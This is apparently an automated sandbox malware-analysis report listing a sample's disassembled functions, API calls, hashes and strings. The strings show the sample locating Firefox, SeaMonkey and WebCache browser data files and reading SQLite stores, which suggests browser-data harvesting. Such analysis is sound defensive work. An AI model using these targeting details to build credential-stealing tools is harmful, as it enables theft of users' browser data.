                                                                                                              • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                              • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                              Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00403E50
                                                                                                              • memset.MSVCRT ref: 00403E65
                                                                                                              • memset.MSVCRT ref: 00403E7A
                                                                                                              • memset.MSVCRT ref: 00403E8F
                                                                                                              • memset.MSVCRT ref: 00403EA4
                                                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                              • memset.MSVCRT ref: 00403F6B
                                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                              • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                              • API String ID: 4039892925-2068335096
                                                                                                              • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                              • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                              • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                              • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                              Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00403FE1
                                                                                                              • memset.MSVCRT ref: 00403FF6
                                                                                                              • memset.MSVCRT ref: 0040400B
                                                                                                              • memset.MSVCRT ref: 00404020
                                                                                                              • memset.MSVCRT ref: 00404035
                                                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                              • memset.MSVCRT ref: 004040FC
                                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                              • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                              • API String ID: 4039892925-3369679110
                                                                                                              • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                              • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                              • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                              • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                              Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy
                                                                                                              • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                              • API String ID: 3510742995-2641926074
                                                                                                              • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                              • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                              • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                              • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                              Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                              • memset.MSVCRT ref: 004033B7
                                                                                                              • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                              • wcscmp.MSVCRT ref: 004033FC
                                                                                                              • _wcsicmp.MSVCRT ref: 00403439
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                              • String ID: $0.@
                                                                                                              • API String ID: 2758756878-1896041820
                                                                                                              • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                              • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                              • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                              • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                              Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 2941347001-0
                                                                                                              • Opcode ID: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                                                                              • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                              • Opcode Fuzzy Hash: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                                                                              • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                              Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00403C09
                                                                                                              • memset.MSVCRT ref: 00403C1E
                                                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                              • wcscat.MSVCRT ref: 00403C47
                                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                              • wcscat.MSVCRT ref: 00403C70
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                              • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                              • API String ID: 1534475566-1174173950
                                                                                                              • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                              • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                              • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                              • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                              Function 00414C2E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                              • memset.MSVCRT ref: 00414C87
                                                                                                              • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                              • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                              Strings
                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                              • API String ID: 71295984-2036018995
                                                                                                              • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                              • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                              • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                              • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                              Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • wcschr.MSVCRT ref: 00414458
                                                                                                              • _snwprintf.MSVCRT ref: 0041447D
                                                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                              • String ID: "%s"
                                                                                                              • API String ID: 1343145685-3297466227
                                                                                                              • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                              • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                              • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                              • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                              Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                              • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                              • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProcProcessTimes
                                                                                                              • String ID: GetProcessTimes$kernel32.dll
                                                                                                              • API String ID: 1714573020-3385500049
                                                                                                              • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                              • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                              • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                              • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                              Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 004087D6
                                                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                              • memset.MSVCRT ref: 00408828
                                                                                                              • memset.MSVCRT ref: 00408840
                                                                                                              • memset.MSVCRT ref: 00408858
                                                                                                              • memset.MSVCRT ref: 00408870
                                                                                                              • memset.MSVCRT ref: 00408888
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 2911713577-0
                                                                                                              • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                              • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                              • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                              • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                              Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                              • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                              • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcmp
                                                                                                              • String ID: @ $SQLite format 3
                                                                                                              • API String ID: 1475443563-3708268960
                                                                                                              • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                              • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                              • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                              • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                              Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcsicmpqsort
                                                                                                              • String ID: /nosort$/sort
                                                                                                              • API String ID: 1579243037-1578091866
                                                                                                              • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                              • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                              • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                              • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                              Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040E60F
                                                                                                              • memset.MSVCRT ref: 0040E629
                                                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                              Strings
                                                                                                              • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                              • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
